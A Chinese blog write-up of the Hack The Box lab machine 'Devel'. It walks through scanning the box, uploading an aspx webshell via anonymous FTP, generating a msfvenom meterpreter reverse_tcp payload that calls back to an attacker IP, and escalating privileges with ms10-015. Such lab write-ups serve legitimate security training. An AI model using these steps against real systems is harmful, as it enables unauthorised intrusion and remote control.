Hack The Box —— Devel


Hack The Box —— Devel

信息搜集

nmap

nmap -T4 -A -v 10.10.10.5

发现服务器开了 21 端口和 80 端口,同时 ftp 服务可以匿名访问,但是不知道版本号。浏览器访问 http 服务,发现 只有 iis 的默认页面。

目录扫描

利用 dirsearch 工具扫描一波目录:

python3 dirsearch -u http://10.10.10.5 -e html

并未有什么特殊的发现。

FTP

匿名访问 FTP 服务,发现当前目录下有写权限,所以,想通过上传 webshell 的方式获取服务器的权限。

漏洞利用

webshell

首先上传 aspx 的 webshell:

浏览器访问,发现 webshell 未报错,可以执行。

用蚁剑链接:

访问一些目录,发现权限不足。

利用蚁剑的虚拟终端,执行 whoami ,发现只有 iis user 的权限,遂想办法提权。

权限提升

利用 msfvenom 生成 exe 木马文件,使用 msf 接收到回连的 shell,方便提权。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f exe > shell.exe

然后将生成的 shell.exe 文件通过蚁剑上传到目标服务器上,并通过虚拟终端执行。

使用 msf 监听端口,接收回连的 shell :

使用 msf 自带的检测脚本,查看可能用于提权的漏洞:

经过一个一个的测试:发现 ms10-015可以用来提权。

成功创建了一个新的 session.

在 meterpreter 下执行 getuid 命令:

发现成功提权。

接下来就可以 type c:\users\Administrator\Desktop\root.txt.txt 获取 flag 了。


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Hack The Box —— Popcorn Hack The Box —— Popcorn
Hack The Box —— Popcorn 信息搜集nmapnmap -T4 -A -v 10.10.10.6发现服务器开了 22 端口和 80 端口浏览器访问 http 服务,发现 只有 apache 的默认页面。 目录扫描利用 di
2019-09-04
下一篇 
Hack The Box —— Optimum Hack The Box —— Optimum
Hack The Box —— Lame 信息搜集nmapnmap -T4 -A -v 10.10.10.8 发现服务器只开了 80 端口,对应 hfs 服务,浏览器访问,发现 hfs 服务的版本号。 exploit-db搜索相关漏洞,发
2019-08-13
  目录